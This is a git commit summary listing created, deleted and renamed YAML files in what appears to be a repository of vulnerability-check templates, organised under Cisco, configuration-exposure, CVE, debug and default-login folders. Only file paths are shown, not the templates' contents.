delete mode 100644 poc/cisco/cisco-network-config-949.yaml
create mode 100644 poc/cisco/cisco-network-config.yaml
delete mode 100644 poc/cisco/cisco-prime-infrastructure-952.yaml
create mode 100644 poc/cisco/cisco-prime-infrastructure-954.yaml
create mode 100644 poc/cisco/cisco-sd-wan-955.yaml
delete mode 100644 poc/cisco/cisco-sd-wan-957.yaml
delete mode 100644 poc/cisco/cisco-secure-desktop-962.yaml
delete mode 100644 poc/cisco/cisco-security-details-963.yaml
rename poc/cisco/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%)
create mode 100644 poc/cisco/cisco-systems-login-973.yaml
delete mode 100644 poc/cisco/cisco-systems-login-975.yaml
create mode 100644 poc/cisco/cisco-telepresence-976.yaml
delete mode 100644 poc/cisco/cisco-telepresence-978.yaml
rename poc/cisco/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%)
delete mode 100644 poc/coldfusion/adobe-coldfusion-detect-82.yaml
create mode 100644 poc/coldfusion/adobe-coldfusion-error-detect-86.yaml
rename poc/coldfusion/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%)
create mode 100644 poc/coldfusion/coldfusion-debug-xss-1153.yaml
delete mode 100644 poc/coldfusion/coldfusion-debug-xss.yaml
create mode 100644 poc/coldfusion/unpatched-coldfusion-10979.yaml
rename poc/config/{aerohive-netconfig-ui.yaml => aerohive-netconfig-ui-200.yaml} (100%)
create mode 100644 poc/config/airflow-configuration-exposure-230.yaml
delete mode 100644 poc/config/airflow-configuration-exposure.yaml
delete mode 100644 poc/config/amazon-docker-config-280.yaml
delete mode 100644 poc/config/amazon-docker-config-disclosure-278.yaml
create mode 100644 poc/config/amazon-docker-config.yaml
create mode 100644 poc/config/ansible-config-disclosure-326.yaml
delete mode 100644 poc/config/ansible-config-disclosure.yaml
create mode 100644 poc/config/api-iconfinder-439.yaml
create mode 100644 poc/config/awstats-config-656.yaml
delete mode 100644 poc/config/awstats-config.yaml
create mode 100644 poc/config/bigip-config-utility-detect-730.yaml
create mode 100644 poc/config/bigip-config-utility-detect-732.yaml
delete mode 100644 poc/config/buffalo-config-injection-798.yaml
create mode 100644 poc/config/buffalo-config-injection-800.yaml
create mode 100644 poc/config/buffalo-config-injection-801.yaml
create mode 100644 poc/config/circleci-config-923.yaml
delete mode 100644 poc/config/cisco-network-config-949.yaml
create mode 100644 poc/config/cisco-network-config.yaml
create mode 100644 poc/config/config-rb-1179.yaml
rename poc/config/{config-rb-1180.yaml => config-rb.yaml} (100%)
delete mode 100644 poc/config/confluence-detect-1187.yaml
create mode 100644 poc/config/confluence-detect-1189.yaml
create mode 100644 poc/config/confluence-ssrf-sharelinks-1192.yaml
delete mode 100644 poc/config/confluence-ssrf-sharelinks-1193.yaml
create mode 100644 poc/config/cors-misconfig-1223.yaml
delete mode 100644 poc/config/docker-compose-config-7059.yaml
create mode 100644 poc/config/docker-compose-config.yaml
delete mode 100644 poc/config/dockercfg-config.yaml
delete mode 100644 poc/config/firebase-config-exposure.yaml
create mode 100644 poc/config/front-page-misconfig-7547.yaml
rename poc/config/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%)
create mode 100644 poc/config/git-config-7635.yaml
rename poc/config/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%)
create mode 100644 poc/config/git-config-nginxoffbyslash-7630.yaml
create mode 100644 poc/config/github-page-config-7654.yaml
delete mode 100644 poc/config/gocd-cruise-configuration-7748.yaml
rename poc/config/{honeywell-scada-config.yaml => honeywell-scada-config-7990.yaml} (100%)
delete mode 100644 poc/config/honeywell-scada-config-7992.yaml
create mode 100644 poc/config/htaccess-config-8043.yaml
create mode 100644 poc/config/httpd-config-8055.yaml
delete mode 100644 poc/config/httpd-config.yaml
delete mode 100644 poc/config/keycloak-openid-config-8475.yaml
create mode 100644 poc/config/keycloak-openid-config.yaml
delete mode 100644 poc/config/magento-config-disclosure.yaml
rename poc/config/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%)
create mode 100644 poc/config/msmtp-config-8967.yaml
rename poc/config/{nginx-config.yaml => nginx-config-9099.yaml} (100%)
delete mode 100644 poc/config/parameters-config-9465.yaml
create mode 100644 poc/config/parameters-config.yaml
create mode 100644 poc/config/prometheus-config-9673.yaml
delete mode 100644 poc/config/prometheus-config.yaml
delete mode 100644 poc/config/samba-config-9987.yaml
create mode 100644 poc/config/samba-config.yaml
delete mode 100644 poc/config/springboot-autoconfig.yaml
create mode 100644 poc/config/springboot-configprops-10442.yaml
delete mode 100644 poc/config/symfony-database-config-10616.yaml
rename poc/config/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%)
create mode 100644 poc/config/tcpconfig.yaml
delete mode 100644 poc/config/tugboat-config-exposure-10842.yaml
rename poc/config/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%)
delete mode 100644 poc/config/wamp-server-configuration-11096.yaml
delete mode 100644 poc/config/web-config-11125.yaml
delete mode 100644 poc/config/wordpress-accessible-wpconfig-11235.yaml
delete mode 100644 poc/config/wordpress-git-config-11278.yaml
delete mode 100644 poc/config/wpengine-config-check.yaml
create mode 100644 poc/config/zend-config-file-11778.yaml
delete mode 100644 poc/config/zend-config-file-11779.yaml
create mode 100644 poc/crlf_injection/crlf-injection-1262.yaml
rename poc/cross_site_request_forgery/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%)
create mode 100644 poc/cve/CNVD-2021-26422.yaml
create mode 100644 poc/cve/CVE-2019-9082 (copy 2).yaml
delete mode 100644 poc/cve/CVE-2020-10124 (copy 1).yaml
create mode 100644 poc/cve/CVE-2022-0921.yaml
create mode 100644 poc/cve/CVE-2023-34039.yaml
create mode 100644 poc/cve/CVE-2024-1183.yaml
create mode 100644 poc/cve/CVE-2024-32651.yaml
create mode 100644 poc/cve/CVE-2024-35668.yaml
create mode 100644 poc/cve/CVE-2024-3668.yaml
create mode 100644 poc/cve/CVE-2024-4468.yaml
create mode 100644 poc/cve/CVE-2024-4661.yaml
create mode 100644 poc/cve/CVE-2024-5087.yaml
create mode 100644 poc/cve/CVE-2024-5091.yaml
create mode 100644 poc/cve/CVE-2024-5613.yaml
create mode 100644 poc/cve/CVE-2024-5638.yaml
create mode 100644 poc/cve/CVE-2024-5654.yaml
create mode 100644 poc/cve/CVE-2024-5663.yaml
create mode 100644 poc/cve/CVE-2024-5758.yaml
create mode 100644 poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml
delete mode 100644 poc/cve/cnvd-2019-01348-1042.yaml
create mode 100644 poc/cve/cnvd-2019-01348-1044.yaml
create mode 100644 poc/cve/cnvd-2019-06255-1046.yaml
delete mode 100644 poc/cve/cnvd-2019-06255-1050.yaml
create mode 100644 poc/cve/cnvd-2019-32204-1053.yaml
delete mode 100644 poc/cve/cnvd-2019-32204-1054.yaml
rename poc/cve/{cnvd-2020-56167-1064.yaml => cnvd-2020-56167-1061.yaml} (100%)
rename poc/cve/{cnvd-2020-62422-1068.yaml => cnvd-2020-62422-1069.yaml} (100%)
delete mode 100644 poc/cve/cnvd-2020-68596-1073.yaml
create mode 100644 poc/cve/cnvd-2020-68596-1074.yaml
create mode 100644 poc/cve/cnvd-2021-01931-1078.yaml
delete mode 100644 poc/cve/cnvd-2021-10543-1082.yaml
rename poc/cve/{cnvd-2021-14536-1088.yaml => cnvd-2021-14536-1087.yaml} (100%)
delete mode 100644 poc/cve/cnvd-2021-15822-1089.yaml
create mode 100644 poc/cve/cnvd-2021-15822-1093.yaml
rename poc/cve/{cnvd-2021-15824-1096.yaml => cnvd-2021-15824-1097.yaml} (100%)
delete mode 100644 poc/cve/cnvd-2021-26422-1103.yaml
create mode 100644 poc/cve/cnvd-2021-28277-1105.yaml
delete mode 100644 poc/cve/cnvd-2021-30167-1108.yaml
rename poc/cve/{cnvd-2021-49104-1113.yaml => cnvd-2021-49104-1114.yaml} (100%)
create mode 100644 poc/cve/cnvd-2022-03672-1116.yaml
delete mode 100644 poc/cve/cnvd-2022-03672-1117.yaml
create mode 100644 poc/cve/cve-2000-0114-1297.yaml
create mode 100644 poc/cve/cve-2002-1131-1304.yaml
delete mode 100644 poc/cve/cve-2007-4504-1342.yaml
create mode 100644 poc/cve/cve-2008-6222.yaml
delete mode 100644 poc/cve/cve-2008-6668-1400.yaml
create mode 100644 poc/cve/cve-2009-0545.yaml
delete mode 100644 poc/cve/cve-2009-1496.yaml
delete mode 100644 poc/cve/cve-2009-2015-1441.yaml
delete mode 100644 poc/cve/cve-2009-2100-1446.yaml
delete mode 100644 poc/cve/cve-2009-3053.yaml
create mode 100644 poc/cve/cve-2010-0943.yaml
delete mode 100644 poc/cve/cve-2010-0972-1522.yaml
create mode 100644 poc/cve/cve-2010-0982.yaml
delete mode 100644 poc/cve/cve-2010-1056.yaml
delete mode 100644 poc/cve/cve-2010-1302-1567.yaml
delete mode 100644 poc/cve/cve-2010-1305-1574.yaml
delete mode 100644 poc/cve/cve-2010-1307-1585.yaml
delete mode 100644 poc/cve/cve-2010-1308.yaml
create mode 100644 poc/cve/cve-2010-1312-1598.yaml
create mode 100644 poc/cve/cve-2010-1312.yaml
create mode 100644 poc/cve/cve-2010-1313-1604.yaml
delete mode 100644 poc/cve/cve-2010-1314.yaml
create mode 100644 poc/cve/cve-2010-1315.yaml
create mode 100644 poc/cve/cve-2010-1345-1621.yaml
create mode 100644 poc/cve/cve-2010-1345.yaml
delete mode 100644 poc/cve/cve-2010-1352.yaml
delete mode 100644 poc/cve/cve-2010-1353-1630.yaml
create mode 100644 poc/cve/cve-2010-1469.yaml
create mode 100644 poc/cve/cve-2010-1470-1653.yaml
delete mode 100644 poc/cve/cve-2010-1474.yaml
delete mode 100644 poc/cve/cve-2010-1491.yaml
create mode 100644 poc/cve/cve-2010-1494.yaml
delete mode 100644 poc/cve/cve-2010-1532.yaml
delete mode 100644 poc/cve/cve-2010-1540-1729.yaml
delete mode 100644 poc/cve/cve-2010-1657-1761.yaml
create mode 100644 poc/cve/cve-2010-1658-1765.yaml
create mode 100644 poc/cve/cve-2010-1658.yaml
delete mode 100644 poc/cve/cve-2010-1659-1773.yaml
create mode 100644 poc/cve/cve-2010-1714-1779.yaml
delete mode 100644 poc/cve/cve-2010-1715.yaml
delete mode 100644 poc/cve/cve-2010-1717-1789.yaml
delete mode 100644 poc/cve/cve-2010-1718.yaml
delete mode 100644 poc/cve/cve-2010-1858.yaml
create mode 100644 poc/cve/cve-2010-1953-1841.yaml
create mode 100644 poc/cve/cve-2010-1981.yaml
create mode 100644 poc/cve/cve-2010-1982.yaml
create mode 100644 poc/cve/cve-2010-2682-1960.yaml
delete mode 100644 poc/cve/cve-2010-2920.yaml
create mode 100644 poc/cve/cve-2010-3203-1987.yaml
create mode 100644 poc/cve/cve-2010-3203.yaml
delete mode 100644 poc/cve/cve-2010-4239-1997.yaml
delete mode 100644 poc/cve/cve-2010-4617.yaml
create mode 100644 poc/cve/cve-2010-5028-2025.yaml
create mode 100644 poc/cve/cve-2010-5278-2030.yaml
create mode 100644 poc/cve/cve-2010-5278.yaml
delete mode 100644 poc/cve/cve-2011-2744.yaml
delete mode 100644 poc/cve/cve-2011-3315-2059.yaml
create mode 100644 poc/cve/cve-2011-4926.yaml
delete mode 100644 poc/cve/cve-2011-5179.yaml
delete mode 100644 poc/cve/cve-2012-0896-2132.yaml
create mode 100644 poc/cve/cve-2012-0981.yaml
create mode 100644 poc/cve/cve-2012-2371.yaml
create mode 100644 poc/cve/cve-2012-4273-2198.yaml
create mode 100644 poc/cve/cve-2012-4768-2207.yaml
delete mode 100644 poc/cve/cve-2013-5528.yaml
delete mode 100644 poc/cve/cve-2013-5979-2280.yaml
create mode 100644 poc/cve/cve-2013-7240.yaml
create mode 100644 poc/cve/cve-2014-2962-2313.yaml
delete mode 100644 poc/cve/cve-2014-4561-2375.yaml
delete mode 100644 poc/cve/cve-2014-4940.yaml
create mode 100644 poc/cve/cve-2014-9094.yaml
create mode 100644 poc/cve/cve-2014-9606-2430.yaml
create mode 100644 poc/cve/cve-2014-9609-2437.yaml
delete mode 100644 poc/cve/cve-2015-0554-2456.yaml
delete mode 100644 poc/cve/cve-2015-1880-2477.yaml
delete mode 100644 poc/cve/cve-2015-2166.yaml
delete mode 100644 poc/cve/cve-2015-3306-2502.yaml
delete mode 100644 poc/cve/cve-2015-4050.yaml
create mode 100644 poc/cve/cve-2015-7780-2604.yaml
delete mode 100644 poc/cve/cve-2016-1000128-2651.yaml
delete mode 100644 poc/cve/cve-2016-1000132-2669.yaml
delete mode 100644 poc/cve/cve-2016-1000134-2678.yaml
delete mode 100644 poc/cve/cve-2016-1000143-2717.yaml
create mode 100644 poc/cve/cve-2016-1000154-2740.yaml
delete mode 100644 poc/cve/cve-2016-10940-2757.yaml
delete mode 100644 poc/cve/cve-2016-6210.yaml
delete mode 100644 poc/cve/cve-2016-7552-2812.yaml
create mode 100644 poc/cve/cve-2017-12542-2884.yaml
delete mode 100644 poc/cve/cve-2017-12615.yaml
delete mode 100644 poc/cve/cve-2017-14535-2928.yaml
delete mode 100644 poc/cve/cve-2017-15647-2955.yaml
create mode 100644 poc/cve/cve-2017-15944-2965.yaml
delete mode 100644 poc/cve/cve-2017-17451-2983.yaml
delete mode 100644 poc/cve/cve-2017-18536-2995.yaml
delete mode 100644 poc/cve/cve-2017-3528-3012.yaml
delete mode 100644 poc/cve/cve-2017-5487.yaml
create mode 100644 poc/cve/cve-2017-5521-3027.yaml
create mode 100644 poc/cve/cve-2017-5631-3031.yaml
delete mode 100644 poc/cve/cve-2017-6090-3044.yaml
delete mode 100644 poc/cve/cve-2017-7391.yaml
create mode 100644 poc/cve/cve-2017-8917-3078.yaml
create mode 100644 poc/cve/cve-2017-9805-3104.yaml
create mode 100644 poc/cve/cve-2017-9822-3106.yaml
create mode 100644 poc/cve/cve-2018-1000129.yaml
delete mode 100644 poc/cve/cve-2018-1000226-3139.yaml
delete mode 100644 poc/cve/cve-2018-10818-3171.yaml
create mode 100644 poc/cve/cve-2018-11409.yaml
delete mode 100644 poc/cve/cve-2018-14064-3301.yaml
delete mode 100644 poc/cve/cve-2018-14728.yaml
delete mode 100644 poc/cve/cve-2018-14912-3315.yaml
delete mode 100644 poc/cve/cve-2018-15517-3331.yaml
delete mode 100644 poc/cve/cve-2018-16133-3358.yaml
create mode 100644 poc/cve/cve-2018-16167-3359.yaml
create mode 100644 poc/cve/cve-2018-16288-3365.yaml
delete mode 100644 poc/cve/cve-2018-17422-3421.yaml
create mode 100644 poc/cve/cve-2018-17431-3423.yaml
delete mode 100644 poc/cve/cve-2018-19386.yaml
delete mode 100644 poc/cve/cve-2018-19752(1).yaml
delete mode 100644 poc/cve/cve-2018-19877(1).yaml
delete mode 100644 poc/cve/cve-2018-20010(1).yaml
create mode 100644 poc/cve/cve-2018-20011(1).yaml
delete mode 100644 poc/cve/cve-2018-20470-3497.yaml
delete mode 100644 poc/cve/cve-2018-20985-3507.yaml
delete mode 100644 poc/cve/cve-2018-3167.yaml
delete mode 100644 poc/cve/cve-2018-5233-3567.yaml
create mode 100644 poc/cve/cve-2018-6008-3574.yaml
delete mode 100644 poc/cve/cve-2018-6200-3578.yaml
create mode 100644 poc/cve/cve-2018-6910-3585.yaml
delete mode 100644 poc/cve/cve-2018-7251-3587.yaml
create mode 100644 poc/cve/cve-2018-7467-3598.yaml
create mode 100644 poc/cve/cve-2018-7700-3618.yaml
delete mode 100644 poc/cve/cve-2018-9118-3654.yaml
create mode 100644 "poc/cve/cve-2018\342\200\22314064(1).yaml"
create mode 100644 poc/cve/cve-2019-1010287-3696.yaml
create mode 100644 poc/cve/cve-2019-10692(1).yaml
create mode 100644 poc/cve/cve-2019-11013-3719.yaml
delete mode 100644 poc/cve/cve-2019-11248-3731.yaml
delete mode 100644 poc/cve/cve-2019-11370(1).yaml
create mode 100644 poc/cve/cve-2019-12962(1).yaml
delete mode 100644 poc/cve/cve-2019-13101-3802.yaml
create mode 100644 poc/cve/cve-2019-14251(1).yaml
create mode 100644 poc/cve/cve-2019-15713-3887.yaml
delete mode 100644 poc/cve/cve-2019-16097.yaml
delete mode 100644 poc/cve/cve-2019-16123-3918.yaml
create mode 100644 poc/cve/cve-2019-16278.yaml
delete mode 100644 poc/cve/cve-2019-16931(1).yaml
delete mode 100644 poc/cve/cve-2019-17418-3981.yaml
create mode 100644 poc/cve/cve-2019-17558.yaml
create mode 100644 poc/cve/cve-2019-18394.yaml
create mode 100644 poc/cve/cve-2019-18665(1).yaml
create mode 100644 poc/cve/cve-2019-18818-4021.yaml
create mode 100644 poc/cve/cve-2019-19368.yaml
delete mode 100644 poc/cve/cve-2019-19824-4053.yaml
delete mode 100644 poc/cve/cve-2019-20210(1).yaml
delete mode 100644 poc/cve/cve-2019-20224(1).yaml
create mode 100644 poc/cve/cve-2019-20933(1).yaml
delete mode 100644 poc/cve/cve-2019-2616(1).yaml
delete mode 100644 poc/cve/cve-2019-2767-4117.yaml
create mode 100644 poc/cve/cve-2019-6340(1).yaml
create mode 100644 poc/cve/cve-2019-7238-4207.yaml
create mode 100644 poc/cve/cve-2019-7609-4233.yaml
delete mode 100644 poc/cve/cve-2019-8446-4252.yaml
delete mode 100644 poc/cve/cve-2019-8903.yaml
create mode 100644 poc/cve/cve-2019-8937-4278.yaml
delete mode 100644 poc/cve/cve-2019-9082-4292.yaml
create mode 100644 poc/cve/cve-2019-9915(1).yaml
create mode 100644 poc/cve/cve-2020-10124(1).yaml
delete mode 100644 poc/cve/cve-2020-10220.yaml
delete mode 100644 poc/cve/cve-2020-11455-4397.yaml
create mode 100644 poc/cve/cve-2020-11530.yaml
create mode 100644 poc/cve/cve-2020-11738(1).yaml
create mode 100644 poc/cve/cve-2020-11978(1).yaml
create mode 100644 poc/cve/cve-2020-13117-4489.yaml
create mode 100644 poc/cve/cve-2020-13121(1).yaml
create mode 100644 poc/cve/cve-2020-13945-4535.yaml
delete mode 100644 poc/cve/cve-2020-14181.yaml
delete mode 100644 poc/cve/cve-2020-14408(1).yaml
create mode 100644 poc/cve/cve-2020-14882.yaml
delete mode 100644 poc/cve/cve-2020-19282-4706.yaml
create mode 100644 poc/cve/cve-2020-19360-4714.yaml
delete mode 100644 poc/cve/cve-2020-2036-4730.yaml
delete mode 100644 poc/cve/cve-2020-20982-4740.yaml
delete mode 100644 poc/cve/cve-2020-22211(1).yaml
create mode 100644 poc/cve/cve-2020-22840.yaml
create mode 100644 poc/cve/cve-2020-24223.yaml
delete mode 100644 poc/cve/cve-2020-24391-4811.yaml
delete mode 100644 poc/cve/cve-2020-25540.yaml
delete mode 100644 poc/cve/cve-2020-27467-4950.yaml
create mode 100644 poc/cve/cve-2020-28976-4989.yaml
create mode 100644 poc/cve/cve-2020-29227-5000.yaml
create mode 100644 poc/cve/cve-2020-29395.yaml
create mode 100644 poc/cve/cve-2020-3452(1).yaml
create mode 100644 poc/cve/cve-2020-35749-5075.yaml
create mode 100644 poc/cve/cve-2020-36510(1).yaml
delete mode 100644 poc/cve/cve-2020-6287.yaml
delete mode 100644 poc/cve/cve-2020-7980(1).yaml
create mode 100644 poc/cve/cve-2020-8194.yaml
create mode 100644 poc/cve/cve-2020-8497-5317.yaml
create mode 100644 poc/cve/cve-2020-8641-5330.yaml
create mode 100644 poc/cve/cve-2020-8654(1).yaml
create mode 100644 poc/cve/cve-2020-9043(1).yaml
create mode 100644 poc/cve/cve-20200924a.yaml
create mode 100644 poc/cve/cve-2021-20038-5443.yaml
delete mode 100644 poc/cve/cve-2021-21287-5492.yaml
create mode 100644 poc/cve/cve-2021-21745(1).yaml
create mode 100644 poc/cve/cve-2021-21801-5531.yaml
create mode 100644 poc/cve/cve-2021-21803-5536.yaml
create mode 100644 poc/cve/cve-2021-22054(1).yaml
create mode 100644 poc/cve/cve-2021-22145-5591.yaml
delete mode 100644 poc/cve/cve-2021-22214-5601.yaml
create mode 100644 poc/cve/cve-2021-22986-5612.yaml
create mode 100644 poc/cve/cve-2021-23241-5621.yaml
delete mode 100644 poc/cve/cve-2021-24146-5631.yaml
delete mode 100644 poc/cve/cve-2021-24236(1).yaml
delete mode 100644 poc/cve/cve-2021-24275-5661.yaml
delete mode 100644 poc/cve/cve-2021-24284(1).yaml
delete mode 100644 poc/cve/cve-2021-24285-5673.yaml
delete mode 100644 poc/cve/cve-2021-24286(1).yaml
create mode 100644 poc/cve/cve-2021-24335-5703.yaml
create mode 100644 poc/cve/cve-2021-24364-5721.yaml
create mode 100644 poc/cve/cve-2021-24488(1).yaml
delete mode 100644 poc/cve/cve-2021-24498-5751.yaml
delete mode 100644 poc/cve/cve-2021-24838-5769.yaml
delete mode 100644 poc/cve/cve-2021-25033(1).yaml
delete mode 100644 poc/cve/cve-2021-25075(1).yaml
create mode 100644 poc/cve/cve-2021-25085(1).yaml
create mode 100644 poc/cve/cve-2021-25118(1).yaml
create mode 100644 poc/cve/cve-2021-26085(1).yaml
delete mode 100644 poc/cve/cve-2021-27519(1).yaml
create mode 100644 poc/cve/cve-2021-27748(1).yaml
delete mode 100644 poc/cve/cve-2021-28149-5943.yaml
delete mode 100644 poc/cve/cve-2021-28150-5949.yaml
create mode 100644 poc/cve/cve-2021-28377(1).yaml
create mode 100644 poc/cve/cve-2021-28918-5975.yaml
create mode 100644 poc/cve/cve-2021-29490-6011.yaml
delete mode 100644 poc/cve/cve-2021-29622.yaml
create mode 100644 poc/cve/cve-2021-30461.yaml
delete mode 100644 poc/cve/cve-2021-31249-6068.yaml
delete mode 100644 poc/cve/cve-2021-3129.yaml
create mode 100644 poc/cve/cve-2021-31589-6095.yaml
delete mode 100644 poc/cve/cve-2021-31682-6102.yaml
delete mode 100644 poc/cve/cve-2021-31805(1).yaml
delete mode 100644 poc/cve/cve-2021-3223(1).yaml
create mode 100644 poc/cve/cve-2021-32305-6134.yaml
create mode 100644 poc/cve/cve-2021-33544-6176.yaml
create mode 100644 poc/cve/cve-2021-33807-6211.yaml
create mode 100644 poc/cve/cve-2021-34370-6221.yaml
delete mode 100644 poc/cve/cve-2021-34643-6238.yaml
delete mode 100644 poc/cve/cve-2021-35265-6245.yaml
create mode 100644 poc/cve/cve-2021-36356(1).yaml
delete mode 100644 poc/cve/cve-2021-37216-6280.yaml
create mode 100644 poc/cve/cve-2021-37416(1).yaml
create mode 100644 poc/cve/cve-2021-37580-6292.yaml
create mode 100644 poc/cve/cve-2021-38702-6314.yaml
delete mode 100644 poc/cve/cve-2021-38704-6317.yaml
create mode 100644 poc/cve/cve-2021-38751-6320.yaml
create mode 100644 poc/cve/cve-2021-39211(1).yaml
create mode 100644 poc/cve/cve-2021-39226-6323.yaml
delete mode 100644 poc/cve/cve-2021-39312(1).yaml
delete mode 100644 poc/cve/cve-2021-41569(1).yaml
delete mode 100644 poc/cve/cve-2021-41691-6460.yaml
delete mode 100644 poc/cve/cve-2021-44103(1).yaml
create mode 100644 poc/cve/cve-2021-44521-6556.yaml
create mode 100644 poc/cve/cve-2021-44528(1).yaml
create mode 100644 poc/cve/cve-2021-45428(1).yaml
delete mode 100644 poc/cve/cve-2021-45968-6588.yaml
delete mode 100644 poc/cve/cve-2021-46381-6597.yaml
create mode 100644 poc/cve/cve-2021-46417(1).yaml
create mode 100644 poc/cve/cve-2021-46422(1).yaml
delete mode 100644 poc/cve/cve-2022-0208(1).yaml
delete mode 100644 poc/cve/cve-2022-0543(1).yaml
create mode 100644 poc/cve/cve-2022-0594(1).yaml
create mode 100644 poc/cve/cve-2022-0599(1).yaml
create mode 100644 poc/cve/cve-2022-0952(1).yaml
delete mode 100644 poc/cve/cve-2022-0968(1).yaml
delete mode 100644 poc/cve/cve-2022-1020(1).yaml
delete mode 100644 poc/cve/cve-2022-1221(1).yaml
create mode 100644 poc/cve/cve-2022-1392(1).yaml
delete mode 100644 poc/cve/cve-2022-1597(1).yaml
delete mode 100644 poc/cve/cve-2022-1713(1).yaml
delete mode 100644 poc/cve/cve-2022-1815(1).yaml
delete mode 100644 poc/cve/cve-2022-1904(1).yaml
create mode 100644 poc/cve/cve-2022-1906(1).yaml
delete mode 100644 poc/cve/cve-2022-1937(1).yaml
delete mode 100644 poc/cve/cve-2022-21705(1).yaml
create mode 100644 poc/cve/cve-2022-2187(1).yaml
create mode 100644 poc/cve/cve-2022-22536-6662.yaml
delete mode 100644 poc/cve/cve-2022-2290(1).yaml
create mode 100644 poc/cve/cve-2022-22972(1).yaml
delete mode 100644 poc/cve/cve-2022-24681(1).yaml
create mode 100644 poc/cve/cve-2022-2486(1).yaml
delete mode 100644 poc/cve/cve-2022-2487(1).yaml
delete mode 100644 poc/cve/cve-2022-24899(1).yaml
delete mode 100644 poc/cve/cve-2022-25323-6724.yaml
delete mode 100644 poc/cve/cve-2022-26134(1).yaml
create mode 100644 poc/cve/cve-2022-26135(1).yaml
delete mode 100644 poc/cve/cve-2022-26352(1).yaml
delete mode 100644 poc/cve/cve-2022-26564(1).yaml
create mode 100644 poc/cve/cve-2022-26960(1).yaml
delete mode 100644 poc/cve/cve-2022-27927(1).yaml
create mode 100644 poc/cve/cve-2022-28079(1).yaml
delete mode 100644 poc/cve/cve-2022-28080(1).yaml
delete mode 100644 poc/cve/cve-2022-29014(1).yaml
delete mode 100644 poc/cve/cve-2022-29299(1).yaml
create mode 100644 poc/cve/cve-2022-29548(1).yaml
delete mode 100644 poc/cve/cve-2022-30073(1).yaml
create mode 100644 poc/cve/cve-2022-30489(1).yaml
delete mode 100644 poc/cve/cve-2022-30776(1).yaml
create mode 100644 poc/cve/cve-2022-30777(1).yaml
delete mode 100644 poc/cve/cve-2022-32007(1).yaml
delete mode 100644 poc/cve/cve-2022-32025(1).yaml
create mode 100644 poc/cve/cve-2022-32028(1).yaml
create mode 100644 poc/cve/cve-2022-32409(1).yaml
create mode 100644 poc/cve/cve-2022-33119(1).yaml
create mode 100644 poc/cve/cve-2022-34046(1).yaml
delete mode 100644 poc/cve/cve-2022-34047(1).yaml
create mode 100644 poc/cve/cve-2022-34048(1).yaml
create mode 100644 poc/cve/cve-2022-34049(1).yaml
delete mode 100644 poc/cve/cve-2022-35416(1).yaml
create mode 100644 poc/cve/cve-2024-23334.yaml
delete mode 100644 poc/cve/resin-cnnvd-200705-315-9866.yaml
create mode 100644 poc/cve/resin-cnnvd-200705-315-9867.yaml
create mode 100644 poc/cve/springForShell-CVE-2022-22963.yaml
create mode 100644 poc/debug/airflow-debug-231.yaml
delete mode 100644 poc/debug/airflow-debug-233.yaml
rename poc/debug/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%)
create mode 100644 poc/debug/aspx-debug-mode-575.yaml
delete mode 100644 poc/debug/aspx-debug-mode-578.yaml
create mode 100644 poc/debug/browserless-debugger-794.yaml
delete mode 100644 poc/debug/browserless-debugger.yaml
create mode 100644 poc/debug/coldfusion-debug-xss-1153.yaml
delete mode 100644 poc/debug/coldfusion-debug-xss.yaml
rename poc/debug/{debug-enabled-6788.yaml => debug-enabled-6789.yaml} (100%)
create mode 100644 poc/debug/debug-enabled-6790.yaml
create mode 100644 poc/debug/django-debug-exposed-404.yaml
delete mode 100644 poc/debug/laravel-debug-enabled-8576.yaml
delete mode 100644 poc/debug/laravel-debug-enabled.yaml
create mode 100644 poc/debug/rails-debug-mode-9806.yaml
delete mode 100644 poc/debug/rails-debug-mode-9807.yaml
create mode 100644 poc/debug/symfony-debugmode-10620.yaml
create mode 100644 poc/debug/wamp-xdebug-detect-11104.yaml
rename poc/debug/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%)
mode change 100755 => 100644 poc/debug/wp-debug-log.yaml
create mode 100644 poc/default/Mantis-Default_login.yaml
delete mode 100644 poc/default/Redmine-Default-Login.yaml
delete mode 100644 poc/default/activemq-default-login-44.yaml
create mode 100644 poc/default/activemq-default-login-48.yaml
rename poc/default/{aem-default-get-servlet-137.yaml => aem-default-get-servlet-135.yaml} (100%)
delete mode 100644 poc/default/aem-default-login-140.yaml
delete mode 100644 poc/default/alphaweb-default-login.yaml
delete mode 100644 poc/default/ambari-default-login-287.yaml
create mode 100644 poc/default/ambari-default-login-289.yaml
rename poc/default/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%)
delete mode 100644 poc/default/arl-default-login-537.yaml
rename poc/default/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%)
create mode 100644 poc/default/canal-default-login-846.yaml
delete mode 100644 poc/default/canal-default-login-849.yaml
delete mode 100644 poc/default/chinaunicom-default-login-906.yaml
rename poc/default/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%)
delete mode 100644 poc/default/cobbler-default-login.yaml
create mode 100644 poc/default/crushftp-default-login.yaml
delete mode 100644 poc/default/default-apache-test-all.yaml
delete mode 100644 poc/default/default-apache2-ubuntu-page.yaml
delete mode 100644 poc/default/default-asp-net-page.yaml
create mode 100644 poc/default/default-codeigniter-page-6833.yaml
delete mode 100644 poc/default/default-detect-generic-6838.yaml
create mode 100644 poc/default/default-detect-generic.yaml
create mode 100644 poc/default/default-jetty-page-6862.yaml
delete mode 100644 poc/default/default-lighttpd-page-6866.yaml
create mode 100644 poc/default/default-lucee-page-6871.yaml
create mode 100644 poc/default/default-nginx-page-6881.yaml
create mode 100644 poc/default/default-openresty.yaml
delete mode 100644 poc/default/default-payara-server-page-6894.yaml
delete mode 100644 poc/default/default-plesk-page.yaml
delete mode 100644 poc/default/default-redhat-test-page-6902.yaml
rename poc/default/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%)
create mode 100644 poc/default/dolphinscheduler-default-login-7073.yaml
